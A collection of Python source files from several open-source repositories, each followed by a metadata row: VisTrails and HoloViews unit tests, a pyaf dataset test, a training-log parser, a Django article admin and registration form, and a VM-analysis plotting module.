import core.db.io
m1 = self.create_module()
xml_str = core.db.io.serialize(m1)
m2 = core.db.io.unserialize(xml_str, Module)
self.assertEquals(m1, m2)
self.assertEquals(m1.id, m2.id)
def testEq(self):
"""Check correctness of equality operator."""
x = Module()
self.assertNotEquals(x, None)
def testAccessors(self):
"""Check that accessors are working."""
x = Module()
self.assertEquals(x.id, -1)
x.id = 10
self.assertEquals(x.id, 10)
self.assertEquals(x.cache, 1)
x.cache = 1
self.assertEquals(x.cache, 1)
self.assertEquals(x.location.x, -1.0)
x.location = Location(x=1, y=x.location.y)
self.assertEquals(x.location.x, 1)
self.assertEquals(x.name, "")
def testSummonModule(self):
"""Check that summon creates a correct module"""
x = Module()
x.name = "String"
x.package = 'edu.utah.sci.vistrails.basic'
try:
registry = get_module_registry()
c = x.summon()
m = registry.get_descriptor_by_name('edu.utah.sci.vistrails.basic',
'String').module
assert type(c) == m
except NoSummon:
msg = "Expected to get a String object, got a NoSummon exception"
self.fail(msg)
def test_constructor(self):
m1_param = ModuleParam(val="1.2",
type="Float",
alias="",
)
m1_function = ModuleFunction(name="value",
parameters=[m1_param],
)
m1 = Module(id=0,
name='Float',
functions=[m1_function],
)
m2 = Module()
m2.name = "Float"
m2.id = 0
f = ModuleFunction()
f.name = "value"
m2.functions.append(f)
param = ModuleParam()
param.strValue = "1.2"
param.type = "Float"
param.alias = ""
f.params.append(param)
assert m1 == m2
def test_str(self):
m = Module(id=0,
name='Float',
functions=[ModuleFunction(name='value',
parameters=[ModuleParam(type='Int',
val='1',
)],
)],
)
str(m)
if __name__ == '__main__':
unittest.main()
| CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/vistrail/module.py | Python | bsd-3-clause | 19,617 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Difference", sigma = 0.0, exog_count = 20, ar_order = 0); | antoinecarme/pyaf | tests/artificial/transf_Difference/trend_ConstantTrend/cycle_12/ar_/test_artificial_1024_Difference_ConstantTrend_12__20.py | Python | bsd-3-clause | 271 |
# by AnvaMiba
import sys
import cPickle
import numpy as np
def main():
if len(sys.argv) != 2:
usage()
outFs = open(sys.argv[1], 'wb')
i = 0
train_i_ce_acc = []
test_i_ce_acc = []
line = sys.stdin.readline()
while line:
tokens = line.split()
if (len(tokens)) > 0 and (tokens[0] == 'Iteration:'):
i = int(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
ce = float(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
acc = float(tokens[1])
train_i_ce_acc.append([i, ce, acc])
if (len(tokens)) > 0 and (tokens[0] == 'VALIDATION'):
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
ce = float(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
acc = float(tokens[1])
test_i_ce_acc.append([i, ce, acc])
line = sys.stdin.readline()
rv_dict = {'train_i_ce_acc': np.array(train_i_ce_acc), 'test_i_ce_acc': np.array(test_i_ce_acc)}
cPickle.dump(rv_dict, outFs, cPickle.HIGHEST_PROTOCOL)
outFs.close()
def usage():
print >> sys.stderr, 'Usage:'
print >> sys.stderr, sys.argv[0], 'pickle_out_file'
sys.exit(-1)
if __name__ == '__main__':
main()
| Avmb/lowrank-gru | mnist_extract_stats_from_log.py | Python | bsd-3-clause | 1,282 |
# -*- coding: utf-8 -*-
from django.contrib import admin
from article.models import Article
from article.forms import ArticleAdminForm
from feincms.admin.editor import ItemEditor, TreeEditor
class ArticleAdmin(ItemEditor, TreeEditor):
"""
Article Control Panel in Admin
"""
class Media:
css = {}
js = []
form = ArticleAdminForm
# the fieldsets config here is used for the add_view, it has no effect
# for the change_view which is completely customized anyway
unknown_fields = ['override_url', 'redirect_to']
fieldsets = [
(None, {
'fields': ['active', 'in_navigation', 'template_key', 'title', 'slug',
'parent'],
}),
item_editor.FEINCMS_CONTENT_FIELDSET,
(_('Other options'), {
'classes': ['collapse',],
'fields': unknown_fields,
}),
]
readonly_fields = []
list_display = ['short_title', 'is_visible_admin', 'in_navigation_toggle', 'template']
list_filter = ['active', 'in_navigation', 'template_key', 'parent']
search_fields = ['title', 'slug']
prepopulated_fields = { 'slug': ('title',), }
raw_id_fields = ['parent']
radio_fields = {'template_key': admin.HORIZONTAL}
def __init__(self, *args, **kwargs):
ensure_completely_loaded()
if len(Article._feincms_templates) > 4:
del(self.radio_fields['template_key'])
super(ArticleAdmin, self).__init__(*args, **kwargs)
# The use of fieldsets makes only fields explicitly listed in there
# actually appear in the admin form. However, extensions should not be
# aware that there is a fieldsets structure and even less modify it;
# we therefore enumerate all of the model's field and forcibly add them
# to the last section in the admin. That way, nobody is left behind.
from django.contrib.admin.util import flatten_fieldsets
present_fields = flatten_fieldsets(self.fieldsets)
for f in self.model._meta.fields:
if not f.name.startswith('_') and not f.name in ('id', 'lft', 'rght', 'tree_id', 'level') and \
not f.auto_created and not f.name in present_fields and f.editable:
self.unknown_fields.append(f.name)
if not f.editable:
self.readonly_fields.append(f.name)
in_navigation_toggle = editor.ajax_editable_boolean('in_navigation', _('in navigation'))
def _actions_column(self, page):
actions = super(PageAdmin, self)._actions_column(page)
actions.insert(0, u'<a href="add/?parent=%s" title="%s"><img src="%simg/admin/icon_addlink.gif" alt="%s"></a>' % (
page.pk, _('Add child page'), django_settings.ADMIN_MEDIA_PREFIX ,_('Add child page')))
actions.insert(0, u'<a href="%s" title="%s"><img src="%simg/admin/selector-search.gif" alt="%s" /></a>' % (
page.get_absolute_url(), _('View on site'), django_settings.ADMIN_MEDIA_PREFIX, _('View on site')))
return actions
def add_view(self, request, form_url='', extra_context=None):
# Preserve GET parameters
return super(PageAdmin, self).add_view(
request=request,
form_url=request.get_full_path(),
extra_context=extra_context)
def response_add(self, request, obj, *args, **kwargs):
response = super(PageAdmin, self).response_add(request, obj, *args, **kwargs)
if 'parent' in request.GET and '_addanother' in request.POST and response.status_code in (301, 302):
# Preserve GET parameters if we are about to add another page
response['Location'] += '?parent=%s' % request.GET['parent']
if 'translation_of' in request.GET:
# Copy all contents
try:
original = self.model._tree_manager.get(pk=request.GET.get('translation_of'))
original = original.original_translation
obj.copy_content_from(original)
obj.save()
except self.model.DoesNotExist:
pass
return response
def _refresh_changelist_caches(self, *args, **kwargs):
self._visible_pages = list(self.model.objects.active().values_list('id', flat=True))
def change_view(self, request, object_id, extra_context=None):
from django.shortcuts import get_object_or_404
if 'create_copy' in request.GET:
page = get_object_or_404(Page, pk=object_id)
new = Page.objects.create_copy(page)
self.message_user(request, ugettext("You may edit the copied page below."))
return HttpResponseRedirect('../%s/' % new.pk)
elif 'replace' in request.GET:
page = get_object_or_404(Page, pk=request.GET.get('replace'))
with_page = get_object_or_404(Page, pk=object_id)
Page.objects.replace(page, with_page)
self.message_user(request, ugettext("You have replaced %s. You may continue editing the now-active page below.") % page)
return HttpResponseRedirect('.')
# Hack around a Django bug: raw_id_fields aren't validated correctly for
# ForeignKeys in 1.1: http://code.djangoproject.com/ticket/8746 details
# the problem - it was fixed for MultipleChoiceFields but not ModelChoiceField
# See http://code.djangoproject.com/ticket/9209
if hasattr(self, "raw_id_fields"):
for k in self.raw_id_fields:
if not k in request.POST:
continue
if not isinstance(getattr(Page, k).field, models.ForeignKey):
continue
v = request.POST[k]
if not v:
del request.POST[k]
continue
try:
request.POST[k] = int(v)
except ValueError:
request.POST[k] = None
return super(PageAdmin, self).change_view(request, object_id, extra_context)
def render_item_editor(self, request, object, context):
if object:
try:
active = Page.objects.active().exclude(pk=object.pk).get(_cached_url=object._cached_url)
context['to_replace'] = active
except Page.DoesNotExist:
pass
return super(PageAdmin, self).render_item_editor(request, object, context)
def is_visible_admin(self, page):
"""
Instead of just showing an on/off boolean, also indicate whether this
page is not visible because of publishing dates or inherited status.
"""
if not hasattr(self, "_visible_pages"):
self._visible_pages = list() # Sanity check in case this is not already defined
if page.parent_id and not page.parent_id in self._visible_pages:
# parent page's invisibility is inherited
if page.id in self._visible_pages:
self._visible_pages.remove(page.id)
return editor.ajax_editable_boolean_cell(page, 'active', override=False, text=_('inherited'))
if page.active and not page.id in self._visible_pages:
# is active but should not be shown, so visibility limited by extension: show a "not active"
return editor.ajax_editable_boolean_cell(page, 'active', override=False, text=_('extensions'))
return editor.ajax_editable_boolean_cell(page, 'active')
is_visible_admin.allow_tags = True
is_visible_admin.short_description = _('is active')
is_visible_admin.editable_boolean_field = 'active'
# active toggle needs more sophisticated result function
def is_visible_recursive(self, page):
retval = []
for c in page.get_descendants(include_self=True):
retval.append(self.is_visible_admin(c))
return retval
is_visible_admin.editable_boolean_result = is_visible_recursive
admin.site.register(Article, ArticleAdmin)
| indexofire/gravoicy | gravoicy/apps/article/admin.py | Python | bsd-3-clause | 7,978 |
from django import forms
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from utils import email_to_username
class RegistrationForm(forms.Form):
"""
Our form for registering a new account.
This uses the user's email as their credentials.
"""
error_css_class = 'error'
required_css_class = 'required'
email = forms.EmailField()
password1 = forms.CharField(widget=forms.PasswordInput,
label=_("Password"))
password2 = forms.CharField(widget=forms.PasswordInput,
label=_("Repeat password"))
def clean_email(self):
"""
Validate that the supplied email address is unique for the
site.
"""
if User.objects.filter(email__iexact=self.cleaned_data['email']):
raise forms.ValidationError(_("This email address is already in use. Please use a different email address."))
return self.cleaned_data['email']
def clean(self):
"""
Verify that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password2']:
raise forms.ValidationError(_("The two password fields didn't match."))
return self.cleaned_data
def create_user(self):
"""
Creates a new user from the existing form, generating a unique username
based on the user's email address.
"""
if self.errors:
raise forms.ValidationError("Unable to create user "
"because the data is invalid")
email = self.cleaned_data['email']
username = email_to_username(email)
password = self.cleaned_data['password1']
return User.objects.create_user(username, email, password)
| paulcwatts/django-auth-utils | auth_utils/forms.py | Python | bsd-3-clause | 2,089 |
from holoviews.element import (
VLine, HLine, Bounds, Box, Rectangles, Segments, Tiles, Path
)
import numpy as np
from .test_plot import TestPlotlyPlot
default_shape_color = '#2a3f5f'
class TestShape(TestPlotlyPlot):
def assert_shape_element_styling(self, element):
props = dict(
fillcolor='orange',
line_color='yellow',
line_dash='dot',
line_width=5,
opacity=0.7
)
element = element.clone().opts(**props)
state = self._get_plot_state(element)
shapes = state['layout']['shapes']
self.assert_property_values(shapes[0], props)
class TestMapboxShape(TestPlotlyPlot):
def setUp(self):
super().setUp()
# Precompute coordinates
self.xs = [3000000, 2000000, 1000000]
self.ys = [-3000000, -2000000, -1000000]
self.x_range = (-5000000, 4000000)
self.x_center = sum(self.x_range) / 2.0
self.y_range = (-3000000, 2000000)
self.y_center = sum(self.y_range) / 2.0
self.lon_range, self.lat_range = Tiles.easting_northing_to_lon_lat(self.x_range, self.y_range)
self.lon_centers, self.lat_centers = Tiles.easting_northing_to_lon_lat(
[self.x_center], [self.y_center]
)
self.lon_center, self.lat_center = self.lon_centers[0], self.lat_centers[0]
self.lons, self.lats = Tiles.easting_northing_to_lon_lat(self.xs, self.ys)
class TestVLineHLine(TestShape):
def assert_vline(self, shape, x, xref='x', ydomain=(0, 1)):
self.assertEqual(shape['type'], 'line')
self.assertEqual(shape['x0'], x)
self.assertEqual(shape['x1'], x)
self.assertEqual(shape['xref'], xref)
self.assertEqual(shape['y0'], ydomain[0])
self.assertEqual(shape['y1'], ydomain[1])
self.assertEqual(shape['yref'], 'paper')
def assert_hline(self, shape, y, yref='y', xdomain=(0, 1)):
self.assertEqual(shape['type'], 'line')
self.assertEqual(shape['y0'], y)
self.assertEqual(shape['y1'], y)
self.assertEqual(shape['yref'], yref)
self.assertEqual(shape['x0'], xdomain[0])
self.assertEqual(shape['x1'], xdomain[1])
self.assertEqual(shape['xref'], 'paper')
def test_single_vline(self):
vline = VLine(3)
state = self._get_plot_state(vline)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_vline(shapes[0], 3)
def test_single_hline(self):
hline = HLine(3)
state = self._get_plot_state(hline)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_hline(shapes[0], 3)
def test_vline_layout(self):
layout = (VLine(1) + VLine(2) +
VLine(3) + VLine(4)).cols(2).opts(vspacing=0, hspacing=0)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_vline(shapes[0], 3, xref='x', ydomain=[0.0, 0.5])
self.assert_vline(shapes[1], 4, xref='x2', ydomain=[0.0, 0.5])
self.assert_vline(shapes[2], 1, xref='x3', ydomain=[0.5, 1.0])
self.assert_vline(shapes[3], 2, xref='x4', ydomain=[0.5, 1.0])
def test_hline_layout(self):
layout = (HLine(1) + HLine(2) +
HLine(3) + HLine(4)).cols(2).opts(vspacing=0, hspacing=0)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_hline(shapes[0], 3, yref='y', xdomain=[0.0, 0.5])
self.assert_hline(shapes[1], 4, yref='y2', xdomain=[0.5, 1.0])
self.assert_hline(shapes[2], 1, yref='y3', xdomain=[0.0, 0.5])
self.assert_hline(shapes[3], 2, yref='y4', xdomain=[0.5, 1.0])
def test_vline_styling(self):
self.assert_shape_element_styling(VLine(3))
def test_hline_styling(self):
self.assert_shape_element_styling(HLine(3))
class TestPathShape(TestShape):
def assert_path_shape_element(self, shape, element, xref='x', yref='y'):
# Check type
self.assertEqual(shape['type'], 'path')
# Check svg path
expected_path = 'M' + 'L'.join([
'{x} {y}'.format(x=x, y=y) for x, y in
zip(element.dimension_values(0), element.dimension_values(1))]) + 'Z'
self.assertEqual(shape['path'], expected_path)
# Check axis references
self.assertEqual(shape['xref'], xref)
self.assertEqual(shape['yref'], yref)
def test_simple_path(self):
path = Path([(0, 0), (1, 1), (0, 1), (0, 0)])
state = self._get_plot_state(path)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], path)
self.assert_shape_element_styling(path)
class TestMapboxPathShape(TestMapboxShape):
def test_simple_path(self):
path = Tiles("") * Path([
(self.x_range[0], self.y_range[0]),
(self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[1]),
(self.x_range[0], self.y_range[0]),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(path)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["lon"], np.array([
self.lon_range[i] for i in (0, 1, 0, 0)
] + [np.nan]))
self.assertEqual(state["data"][1]["lat"], np.array([
self.lat_range[i] for i in (0, 1, 1, 0)
] + [np.nan]))
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestBounds(TestPathShape):
def test_single_bounds(self):
bounds = Bounds((1, 2, 3, 4))
state = self._get_plot_state(bounds)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], bounds)
def test_bounds_layout(self):
bounds1 = Bounds((0, 0, 1, 1))
bounds2 = Bounds((0, 0, 2, 2))
bounds3 = Bounds((0, 0, 3, 3))
bounds4 = Bounds((0, 0, 4, 4))
layout = (bounds1 + bounds2 +
bounds3 + bounds4).cols(2)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_path_shape_element(shapes[0], bounds3, xref='x', yref='y')
self.assert_path_shape_element(shapes[1], bounds4, xref='x2', yref='y2')
self.assert_path_shape_element(shapes[2], bounds1, xref='x3', yref='y3')
self.assert_path_shape_element(shapes[3], bounds2, xref='x4', yref='y4')
def test_bounds_styling(self):
self.assert_shape_element_styling(Bounds((1, 2, 3, 4)))
class TestMapboxBounds(TestMapboxShape):
def test_single_bounds(self):
bounds = Tiles("") * Bounds(
(self.x_range[0], self.y_range[0], self.x_range[1], self.y_range[1])
).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(bounds)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["lon"], np.array([
self.lon_range[i] for i in (0, 0, 1, 1, 0)
]))
self.assertEqual(state["data"][1]["lat"], np.array([
self.lat_range[i] for i in (0, 1, 1, 0, 0)
]))
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
def test_bounds_layout(self):
bounds1 = Bounds((0, 0, 1, 1))
bounds2 = Bounds((0, 0, 2, 2))
bounds3 = Bounds((0, 0, 3, 3))
bounds4 = Bounds((0, 0, 4, 4))
layout = (Tiles("") * bounds1 + Tiles("") * bounds2 +
Tiles("") * bounds3 + Tiles("") * bounds4).cols(2)
state = self._get_plot_state(layout)
self.assertEqual(state['data'][1]["subplot"], "mapbox")
self.assertEqual(state['data'][3]["subplot"], "mapbox2")
self.assertEqual(state['data'][5]["subplot"], "mapbox3")
self.assertEqual(state['data'][7]["subplot"], "mapbox4")
self.assertNotIn("xaxis", state['layout'])
self.assertNotIn("yaxis", state['layout'])
class TestBox(TestPathShape):
def test_single_box(self):
box = Box(0, 0, (1, 2), orientation=1)
state = self._get_plot_state(box)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], box)
def test_bounds_layout(self):
box1 = Box(0, 0, (1, 1), orientation=0)
box2 = Box(0, 0, (2, 2), orientation=0.5)
box3 = Box(0, 0, (3, 3), orientation=1.0)
box4 = Box(0, 0, (4, 4), orientation=1.5)
layout = (box1 + box2 +
box3 + box4).cols(2)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_path_shape_element(shapes[0], box3, xref='x', yref='y')
self.assert_path_shape_element(shapes[1], box4, xref='x2', yref='y2')
self.assert_path_shape_element(shapes[2], box1, xref='x3', yref='y3')
self.assert_path_shape_element(shapes[3], box2, xref='x4', yref='y4')
def test_box_styling(self):
self.assert_shape_element_styling(Box(0, 0, (1, 1)))
class TestMapboxBox(TestMapboxShape):
def test_single_box(self):
box = Tiles("") * Box(0, 0, (1000000, 2000000)).redim.range(
x=self.x_range, y=self.y_range
)
x_box_range = [-500000, 500000]
y_box_range = [-1000000, 1000000]
lon_box_range, lat_box_range = Tiles.easting_northing_to_lon_lat(x_box_range, y_box_range)
state = self._get_plot_state(box)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
lon_box_range[i] for i in (0, 0, 1, 1, 0)
]))
self.assertEqual(state["data"][1]["lat"], np.array([
lat_box_range[i] for i in (0, 1, 1, 0, 0)
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestRectangles(TestPathShape):
def test_boxes_simple(self):
boxes = Rectangles([(0, 0, 1, 1), (2, 2, 4, 3)])
state = self._get_plot_state(boxes)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 2)
self.assertEqual(shapes[0], {'type': 'rect', 'x0': 0, 'y0': 0, 'x1': 1,
'y1': 1, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(shapes[1], {'type': 'rect', 'x0': 2, 'y0': 2, 'x1': 4,
'y1': 3, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(state['layout']['xaxis']['range'], [0, 4])
self.assertEqual(state['layout']['yaxis']['range'], [0, 3])
class TestMapboxRectangles(TestMapboxShape):
def test_rectangles_simple(self):
rectangles = Tiles("") * Rectangles([
(0, 0, self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[0], 0, 0),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(rectangles)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
0, 0, self.lon_range[1], self.lon_range[1], 0, np.nan,
self.lon_range[0], self.lon_range[0], 0, 0, self.lon_range[0], np.nan
]))
self.assertEqual(state["data"][1]["lat"], np.array([
0, self.lat_range[1], self.lat_range[1], 0, 0, np.nan,
self.lat_range[0], 0, 0, self.lat_range[0], self.lat_range[0], np.nan
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestSegments(TestPathShape):
def test_segments_simple(self):
boxes = Segments([(0, 0, 1, 1), (2, 2, 4, 3)])
state = self._get_plot_state(boxes)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 2)
self.assertEqual(shapes[0], {'type': 'line', 'x0': 0, 'y0': 0, 'x1': 1,
'y1': 1, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(shapes[1], {'type': 'line', 'x0': 2, 'y0': 2, 'x1': 4,
'y1': 3, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(state['layout']['xaxis']['range'], [0, 4])
self.assertEqual(state['layout']['yaxis']['range'], [0, 3])
class TestMapboxSegments(TestMapboxShape):
def test_segments_simple(self):
rectangles = Tiles("") * Segments([
(0, 0, self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[0], 0, 0),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(rectangles)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
0, self.lon_range[1], np.nan,
self.lon_range[0], 0, np.nan
]))
self.assertEqual(state["data"][1]["lat"], np.array([
0, self.lat_range[1], np.nan,
self.lat_range[0], 0, np.nan
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
| ioam/holoviews | holoviews/tests/plotting/plotly/test_shapeplots.py | Python | bsd-3-clause | 15,348 |
# Virtual memory analysis scripts.
# Developed 2012-2014 by Peter Hornyack, [email protected]
# Copyright (c) 2012-2014 Peter Hornyack and University of Washington
from plotting.multiapp_plot_class import *
from util.pjh_utils import *
from plotting.plots_common import *
import trace.vm_common as vm
##############################################################################
# IMPORTANT: don't use any global / static variables here, otherwise
# they will be shared across plots! (and bad things like double-counting
# of vmas will happen). Constants are ok.
class vmaops_auxdata:
def __init__(self):
self.opcounts = dict()
self.veryfirstvma = True
return
def vmaops_resetfn(auxdata):
auxdata.opcounts.clear()
auxdata.veryfirstvma = True
return
def vmaops_all_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['alloc', 'free', 'resize', 'relocation', 'access_change',
'flag_change']
label_series_with_app = True
combine_ops = True
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_nonallocfree_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['resize', 'relocation', 'access_change', 'flag_change']
label_series_with_app = True
combine_ops = True
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_allocs_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['alloc']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_frees_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['free']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_resizes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['resize']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_relocations_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['relocation']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_access_changes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['access_change']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_flag_changes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['flag_change']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_datafn(auxdata, plot_event, tgid, currentapp, desired_ops,
label_series_with_app=True, combine_ops=False):
tag = 'vmaops_datafn'
vma = plot_event.vma
if vma is None:
return None
# Skip this vma if it's for a shared lib, guard region, etc.
# Are there any other special considerations that we have to
# make for ignored vmas here (like in vmacount_datafn and
# vm_size_datafn)? These are the vma-op possibilities that
# are tracked below:
# alloc map
# resize remap
# relocation remap
# access_change remap
# flag_change remap
# free unmap
# If any of these operations act on a shared-lib / guard /
# shared-file vma, then they will be ignored here. One
# possible weirdness that I see is if a vma is first allocated
# as something that's ignored (e.g. r--pf for a shared lib) and
# then is access_changed to something that's not ignored, it
# will appear to be an access_change without a corresponding
# alloc, but I think this case occurs rarely if ever. The opposite
# occurs more frequently: something that was previously counted
# (e.g. rw-pf for a shared lib) is access_changed to something
# that's now ignored. In this case, the access_change will
# never be counted, and additionally there will be an alloc
# without a corresponding free.
# Ok, so this could be a little weird, and difficult to handle
# here because we don't do any tracking on unmaps at all.
# Just live with the weirdness I guess, or comment out the
# ignore_vma code here altogether for vmaops plots, depending
# on what we want to count exactly.
if vm.ignore_vma(vma):
debug_ignored(tag, ("ignoring vma {}").format(vma))
return None
# See extensive comments in consume_vma() about how each operation
# is encoded, especially frees!
# Look for explicit free operations first, then ignore any unmap
# operations that are part of unmap-remap pairs and count the
# remap operations.
if vma.is_unmapped and vma.unmap_op == 'free':
op = 'free'
timestamp = vma.unmap_timestamp
elif not vma.is_unmapped:
op = vma.vma_op
timestamp = vma.timestamp
elif auxdata.veryfirstvma:
# Create a point with the very first timestamp, so that every
# plot will start from the same time (rather than every plot
# starting from the first occurrence of a desired_op). This
# difference is meaningful for apps with very short execution
# times (e.g. it's misleading if the "frees" plot starts from
# the time of the very first free, which could only be at
# the very end of the execution).
# Only check this condition after checking the op conditions
# above, so that we don't skip the first op if it's meaningful
# for desired_ops.
# This works for the very first timestamp, but we should also
# do this for the very last timestamp too (which we don't
# know until plotting time... crap).
op = 'veryfirst'
timestamp = vma.timestamp
else:
print_debug(tag, ("vma_op={}, is_unmapped={}, unmap_op={}"
"this is an unmap for an unmap-remap "
"pair, so not counting this as an op.").format(vma.vma_op,
vma.is_unmapped, vma.unmap_op))
return None
print_debug(tag, ("op={}, timestamp={}").format(op, timestamp))
if op not in desired_ops and op != 'veryfirst':
# Don't care about this op type
return None
elif combine_ops:
# Combine all desired ops into one series
op_orig = op
op = 'combined'
try:
count = auxdata.opcounts[op]
except KeyError:
if op != 'veryfirst': # usual case
count = 0
else:
# This is the weird case: we want to create a 0 datapoint
# for the op that this plot is tracking. If this plot is
# tracking more than one op type, but is not combining
# them, then this gets a bit weird... but this doesn't
# actually happen right now.
count = -1
op = desired_ops[0]
if len(desired_ops) > 1:
print_warning(tag, ("very first op is not in desired_ops, "
"but desired_ops has len > 1, so creating a 0 datapoint "
"for just the first op {}").format(op))
count += 1
auxdata.opcounts[op] = count
auxdata.veryfirstvma = False
if count == 0:
print_debug(tag, ("creating a 0 datapoint for op {} "
"at timestamp {}").format(op, timestamp))
point = datapoint()
point.timestamp = timestamp
point.count = count
point.appname = currentapp
if label_series_with_app:
# No longer label seriesname with op - just with app name, and
# then use op in the title.
#seriesname = "{}-{}".format(currentapp, op)
seriesname = "{}".format(currentapp)
else:
seriesname = op
if combine_ops:
# don't allow, would put all ops for all apps into one series.
print_error(tag, ("invalid combination of label_series "
"and combine_ops"))
seriesname = op_orig
# Return a list of (seriesname, datapoint) tuples:
return [(seriesname, point)]
def vmaops_ts_plotfn(seriesdict, plotname, workingdir, title, ysplits=None):
tag = 'vmaops_ts_plotfn'
for appserieslist in seriesdict.values():
if False:
for S in appserieslist:
for dp in S.data:
print_debug(tag, ("debug: datapoint: count={}, "
"timestamp={}").format(dp.count, dp.timestamp))
normalize_appserieslist(appserieslist, True)
if False:
for S in appserieslist:
for dp in S.data:
print_debug(tag, ("debug: normalized: count={}, "
"timestamp={}").format(dp.count, dp.timestamp))
cp_series = handle_cp_series(seriesdict)
plotdict = construct_scale_ts_plotdict(seriesdict)
# Set up y-axis splits: set to None to just use one plot, or pass
# a list of maximum y-values and plot_time_series will split up
# the series into multiple plots, each plot with a different y-axis.
#ysplits = []
if ysplits is None:
ysplits = [100, 1000, 10000, 100000]
#title = ("VM operations over time").format()
xaxis = "Execution time"
